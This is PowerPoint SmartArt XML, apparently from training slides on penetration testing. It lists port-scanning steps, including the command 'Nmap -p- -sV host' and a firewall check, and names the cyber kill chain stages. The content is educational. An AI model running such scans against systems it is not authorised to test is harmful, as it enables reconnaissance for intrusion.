    <dgm:cxn modelId="{5B9BE6BF-3FEA-46C0-8B11-AA0AF0CDD3B5}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{6F0FAC18-9360-49B4-83C9-3EE79CABF66A}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{B4B2650B-1919-4D27-A83E-DFE5C353F009}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{92B44415-74D6-41D1-B18B-60338B584AB0}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hChevron3"/>
    <dgm:cxn modelId="{87E3C495-7EB4-4C9F-8E60-AC793C79879D}" type="presParOf" srcId="{00823BCA-70BA-4518-8D52-4E3C9CC2CA90}" destId="{D1A1A15E-12EF-441A-BDA0-6BEB9C21930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90FEDE-AC83-8746-95DA-3EE67A9317E2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BD3E4E-5D58-2842-8FCB-970A8D70E299}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Quick Port Scan</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8CA2281-8E62-0C48-9005-CAEF05BA2ACD}" type="parTrans" cxnId="{56CB4254-15D4-5843-99A4-B53DDF8EF8DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{111B7DB4-2847-D949-B437-FE075F0FC02E}" type="sibTrans" cxnId="{56CB4254-15D4-5843-99A4-B53DDF8EF8DF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B8BE6075-81D2-1B45-9465-EE4270361676}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>TCP </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99537BC9-06DB-B442-8FB8-4A684C4E4C33}" type="parTrans" cxnId="{C4A9BC7C-57BE-2C4E-8C59-323B9FE40432}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79C88CB8-6F60-B94B-BA5C-FCD498F61483}" type="sibTrans" cxnId="{C4A9BC7C-57BE-2C4E-8C59-323B9FE40432}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07777707-43BB-0142-8F01-26EAD759D993}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Check for Blocking Controls (Firewalls)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C022BE2-24C2-AF40-83BF-09C82DA48B41}" type="parTrans" cxnId="{86DC45F5-D6BF-9340-A520-9374213F7B32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{283095D1-A35B-1848-A78B-4D85FBB746E8}" type="sibTrans" cxnId="{86DC45F5-D6BF-9340-A520-9374213F7B32}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CEFFFF7-37EE-7345-85FB-84E284E06662}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B3D91633-FF71-904D-A6FA-8EAC2E06CC60}" type="parTrans" cxnId="{362E1220-004E-774D-9123-09E9C63A062C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78C3F455-28A4-244D-99C1-3062C3EA5BCA}" type="sibTrans" cxnId="{362E1220-004E-774D-9123-09E9C63A062C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Full Port Scan and Service Enumeration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0E9B05E-3947-784C-8E0C-75B9FE2FD039}" type="parTrans" cxnId="{287A7DF2-C2CB-994F-B77F-8B0AFCA96C5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EC2C20A-5886-C245-9C36-61A15C6CB601}" type="sibTrans" cxnId="{287A7DF2-C2CB-994F-B77F-8B0AFCA96C5E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F6583AF4-8506-3A41-A0C3-80639E44665D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Nmap -p- -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0" err="1"/>
            <a:t>sV</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t> host</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EAC8015B-D00B-9C48-9C41-B16EB1ED1A37}" type="parTrans" cxnId="{C2B32D1B-1C6F-294C-9DC2-38404868FC3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E61F2ACE-8831-D340-8B01-51E8838C92F5}" type="sibTrans" cxnId="{C2B32D1B-1C6F-294C-9DC2-38404868FC3B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2937FBF-655A-0241-9871-F05559D56F85}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>UDP</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{482E6C6F-4CB1-404A-BDB7-109BB8ECBBF5}" type="parTrans" cxnId="{71283D6F-53AB-7A42-9789-DCC6114FD129}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C4FEB63-A1DA-8D42-86B5-306F428A9C81}" type="sibTrans" cxnId="{71283D6F-53AB-7A42-9789-DCC6114FD129}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" type="pres">
      <dgm:prSet presAssocID="{7990FEDE-AC83-8746-95DA-3EE67A9317E2}" presName="rootnode" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chMax/>
          <dgm:chPref/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2E04366F-6020-AA4F-999F-69253223CF3A}" type="pres">
      <dgm:prSet presAssocID="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{51D60D09-FBEB-AB49-81A0-6D0C0E36B268}" type="pres">
      <dgm:prSet presAssocID="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" presName="bentUpArrow1" presStyleLbl="alignImgPlace1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{95806804-05CE-A74E-AB8A-26B7ED1036E9}" type="pres">
      <dgm:prSet presAssocID="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299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325548CA-DB42-F84E-B93B-F75710B9E489}" type="pres">
      <dgm:prSet presAssocID="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299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7D9AA0A-945F-A247-A52E-38C9BAEEE80B}" type="pres">
      <dgm:prSet presAssocID="{111B7DB4-2847-D949-B437-FE075F0FC02E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{190AF481-D5A9-B043-8759-0FFF61EBBCF5}" type="pres">
      <dgm:prSet presAssocID="{07777707-43BB-0142-8F01-26EAD759D993}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F30BB8C0-4372-6F40-94DC-6BC302E148EE}" type="pres">
      <dgm:prSet presAssocID="{07777707-43BB-0142-8F01-26EAD759D993}" presName="bentUpArrow1" presStyleLbl="alignImgPlace1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{ED309EB4-AAE2-8F44-9F15-1C2872FB5EA1}" type="pres">
      <dgm:prSet presAssocID="{07777707-43BB-0142-8F01-26EAD759D99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62A8BDE-5F06-4740-B595-13292BAAE40E}" type="pres">
      <dgm:prSet presAssocID="{07777707-43BB-0142-8F01-26EAD759D993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F08F5FC-3B6E-9841-816C-0D0B80A3EAFD}" type="pres">
      <dgm:prSet presAssocID="{283095D1-A35B-1848-A78B-4D85FBB746E8}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{0C7AA1C2-EC83-FD48-B091-5926DDE59325}" type="pres">
      <dgm:prSet presAssocID="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A0DE1938-E58E-4640-AE1E-A3365638A212}" type="pres">
      <dgm:prSet presAssocID="{1DA46479-7A83-3645-9EDF-3DCA1DEE982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BFD2C92E-CD3C-4744-B5ED-521B87883D1A}" type="pres">
      <dgm:prSet presAssocID="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820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A91D10F-4E9B-964A-8FF3-110EADDFF5EF}" type="presOf" srcId="{2CEFFFF7-37EE-7345-85FB-84E284E06662}" destId="{762A8BDE-5F06-4740-B595-13292BAAE40E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{6780B517-CAD5-0D40-8C14-ABE258680D7D}" type="presOf" srcId="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820}" destId="{A0DE1938-E58E-4640-AE1E-A3365638A212}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{C2B32D1B-1C6F-294C-9DC2-38404868FC3B}" srcId="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820}" destId="{F6583AF4-8506-3A41-A0C3-80639E44665D}" srcOrd="0" destOrd="0" parTransId="{EAC8015B-D00B-9C48-9C41-B16EB1ED1A37}" sibTransId="{E61F2ACE-8831-D340-8B01-51E8838C92F5}"/>
    <dgm:cxn modelId="{362E1220-004E-774D-9123-09E9C63A062C}" srcId="{07777707-43BB-0142-8F01-26EAD759D993}" destId="{2CEFFFF7-37EE-7345-85FB-84E284E06662}" srcOrd="0" destOrd="0" parTransId="{B3D91633-FF71-904D-A6FA-8EAC2E06CC60}" sibTransId="{78C3F455-28A4-244D-99C1-3062C3EA5BCA}"/>
    <dgm:cxn modelId="{38A1BC60-56CC-D546-848F-6DEDD88A4049}" type="presOf" srcId="{F6583AF4-8506-3A41-A0C3-80639E44665D}" destId="{BFD2C92E-CD3C-4744-B5ED-521B87883D1A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{E838B945-6F16-7B48-B956-3B3C3DFC9EFA}" type="presOf" srcId="{7990FEDE-AC83-8746-95DA-3EE67A9317E2}" destId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{71283D6F-53AB-7A42-9789-DCC6114FD129}" srcId="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" destId="{C2937FBF-655A-0241-9871-F05559D56F85}" srcOrd="1" destOrd="0" parTransId="{482E6C6F-4CB1-404A-BDB7-109BB8ECBBF5}" sibTransId="{1C4FEB63-A1DA-8D42-86B5-306F428A9C81}"/>
    <dgm:cxn modelId="{11B2B06F-00BC-BB48-A6F8-E308C4A4262B}" type="presOf" srcId="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" destId="{95806804-05CE-A74E-AB8A-26B7ED1036E9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{56CB4254-15D4-5843-99A4-B53DDF8EF8DF}" srcId="{7990FEDE-AC83-8746-95DA-3EE67A9317E2}" destId="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" srcOrd="0" destOrd="0" parTransId="{F8CA2281-8E62-0C48-9005-CAEF05BA2ACD}" sibTransId="{111B7DB4-2847-D949-B437-FE075F0FC02E}"/>
    <dgm:cxn modelId="{C4A9BC7C-57BE-2C4E-8C59-323B9FE40432}" srcId="{6CBD3E4E-5D58-2842-8FCB-970A8D70E299}" destId="{B8BE6075-81D2-1B45-9465-EE4270361676}" srcOrd="0" destOrd="0" parTransId="{99537BC9-06DB-B442-8FB8-4A684C4E4C33}" sibTransId="{79C88CB8-6F60-B94B-BA5C-FCD498F61483}"/>
    <dgm:cxn modelId="{F3EB7F87-7A02-C243-A716-112A3821318D}" type="presOf" srcId="{07777707-43BB-0142-8F01-26EAD759D993}" destId="{ED309EB4-AAE2-8F44-9F15-1C2872FB5EA1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{96D6E0BD-31E6-D445-B2A3-954BD63480B7}" type="presOf" srcId="{C2937FBF-655A-0241-9871-F05559D56F85}" destId="{325548CA-DB42-F84E-B93B-F75710B9E489}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{B8B695BF-F695-4344-B84B-7F269DC82470}" type="presOf" srcId="{B8BE6075-81D2-1B45-9465-EE4270361676}" destId="{325548CA-DB42-F84E-B93B-F75710B9E489}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{287A7DF2-C2CB-994F-B77F-8B0AFCA96C5E}" srcId="{7990FEDE-AC83-8746-95DA-3EE67A9317E2}" destId="{1DA46479-7A83-3645-9EDF-3DCA1DEE9820}" srcOrd="2" destOrd="0" parTransId="{A0E9B05E-3947-784C-8E0C-75B9FE2FD039}" sibTransId="{1EC2C20A-5886-C245-9C36-61A15C6CB601}"/>
    <dgm:cxn modelId="{86DC45F5-D6BF-9340-A520-9374213F7B32}" srcId="{7990FEDE-AC83-8746-95DA-3EE67A9317E2}" destId="{07777707-43BB-0142-8F01-26EAD759D993}" srcOrd="1" destOrd="0" parTransId="{4C022BE2-24C2-AF40-83BF-09C82DA48B41}" sibTransId="{283095D1-A35B-1848-A78B-4D85FBB746E8}"/>
    <dgm:cxn modelId="{CD7590EE-90CF-9A49-96CF-34867BA1880C}" type="presParOf" srcId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" destId="{2E04366F-6020-AA4F-999F-69253223CF3A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{968870FD-C3BB-C14E-84FF-E6726D9DA6EC}" type="presParOf" srcId="{2E04366F-6020-AA4F-999F-69253223CF3A}" destId="{51D60D09-FBEB-AB49-81A0-6D0C0E36B268}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{8F671AC8-BE06-BE4E-9CE1-9201CF406DC5}" type="presParOf" srcId="{2E04366F-6020-AA4F-999F-69253223CF3A}" destId="{95806804-05CE-A74E-AB8A-26B7ED1036E9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{EBADAD8E-BD2E-F342-881A-0F4659F79D70}" type="presParOf" srcId="{2E04366F-6020-AA4F-999F-69253223CF3A}" destId="{325548CA-DB42-F84E-B93B-F75710B9E489}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{ED292091-4429-3145-92D7-A37BB2B7DCD3}" type="presParOf" srcId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" destId="{77D9AA0A-945F-A247-A52E-38C9BAEEE80B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{047E3724-1174-2F48-9FA0-B8B6BC2559F6}" type="presParOf" srcId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" destId="{190AF481-D5A9-B043-8759-0FFF61EBBCF5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{5B1FF603-C584-8B49-ADC1-3EFC37464253}" type="presParOf" srcId="{190AF481-D5A9-B043-8759-0FFF61EBBCF5}" destId="{F30BB8C0-4372-6F40-94DC-6BC302E148EE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{00CAF401-80B8-2A48-95EF-8B2181F1C61A}" type="presParOf" srcId="{190AF481-D5A9-B043-8759-0FFF61EBBCF5}" destId="{ED309EB4-AAE2-8F44-9F15-1C2872FB5EA1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{2ADCF886-C599-D14E-82A1-185A213AB0C1}" type="presParOf" srcId="{190AF481-D5A9-B043-8759-0FFF61EBBCF5}" destId="{762A8BDE-5F06-4740-B595-13292BAAE40E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{8E52EA06-66F2-514E-B99E-72D57E692674}" type="presParOf" srcId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" destId="{DF08F5FC-3B6E-9841-816C-0D0B80A3EAFD}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{B41E2460-2037-4A48-B939-B59DDEBD687A}" type="presParOf" srcId="{4DDB9409-D755-2144-8E9A-26E94FD9F22E}" destId="{0C7AA1C2-EC83-FD48-B091-5926DDE59325}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{D22A94F4-7377-AB46-87C2-93A3897371F1}" type="presParOf" srcId="{0C7AA1C2-EC83-FD48-B091-5926DDE59325}" destId="{A0DE1938-E58E-4640-AE1E-A3365638A212}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/StepDownProcess"/>
    <dgm:cxn modelId="{568B62F9-E815-8C42-AF29-F5C4117CAFD8}" type="presParOf" srcId="{0C7AA1C2-EC83-FD48-B091-5926DDE59325}" destId="{BFD2C92E-CD3C-4744-B5ED-521B87883D1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C09C4-BEE7-4688-BF30-58E2C7BED38F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5748962" y="98530"/>
          <a:ext cx="1856891" cy="96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Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5748962" y="98530"/>
        <a:ext cx="1856891" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B54C72F4-0D83-4A51-A315-6C856AF8C3CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3287176" y="294252"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 19416492"/>
            <a:gd name="adj4" fmla="val 18666618"/>
            <a:gd name="adj5" fmla="val 43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83BC-83AE-47CB-A96E-1F7247EB63F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6903667" y="1564994"/>
          <a:ext cx="2004767" cy="96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Weaponization</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6903667" y="1564994"/>
        <a:ext cx="2004767" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8C856DE0-6582-488A-B9D6-7866B9135E34}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3153760" y="54136"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 1229934"/>
            <a:gd name="adj4" fmla="val 21557551"/>
            <a:gd name="adj5" fmla="val 43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E02C3-8765-4560-9AD3-F118D2CBEA96}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6977412" y="3513164"/>
          <a:ext cx="967962" cy="96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Delivery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6977412" y="3513164"/>
        <a:ext cx="967962" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8415F704-377D-45E8-B3A7-3B1128A7B574}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3946739" y="-298953"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 5131994"/>
            <a:gd name="adj4" fmla="val 4611713"/>
            <a:gd name="adj5" fmla="val 43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943C1-02D9-4588-B200-8F69BA265515}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4897590" y="4190389"/>
          <a:ext cx="1578602" cy="96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Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4897590" y="4190389"/>
        <a:ext cx="1578602" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C442F18-DDC4-4CAA-8FBD-4E2FF28BA77C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2363206" y="-278059"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 5888847"/>
            <a:gd name="adj4" fmla="val 5359498"/>
            <a:gd name="adj5" fmla="val 43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18046-95A2-426D-B929-94F60BF39549}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3060134" y="3513164"/>
          <a:ext cx="1601001" cy="96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Installation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3060134" y="3513164"/>
        <a:ext cx="1601001" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0AF4AC1B-E06F-48E1-8BB4-EB0F1CC81997}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3153760" y="54136"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 10607583"/>
            <a:gd name="adj4" fmla="val 9335200"/>
            <a:gd name="adj5" fmla="val 43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48EE0-C090-408C-942B-72CC47DADE39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2533921" y="1564994"/>
          <a:ext cx="1764112" cy="96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Command &amp; Control</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2533921" y="1564994"/>
        <a:ext cx="1764112" cy="967962"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4A2A1357-4F14-418A-BE0B-CC77B55B5D07}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3153760" y="54136"/>
          <a:ext cx="5014508" cy="5014508"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 3764"/>
            <a:gd name="adj2" fmla="val 234866"/>
            <a:gd name="adj3" fmla="val 13559433"/>
            <a:gd name="adj4" fmla="val 12338320"/>
            <a:gd name="adj5" fmla="val 43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1A97F-4D88-4428-97AE-D0DC2CF76558}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4177897" y="2683"/>
          <a:ext cx="967962" cy="96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Actions on Objective</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
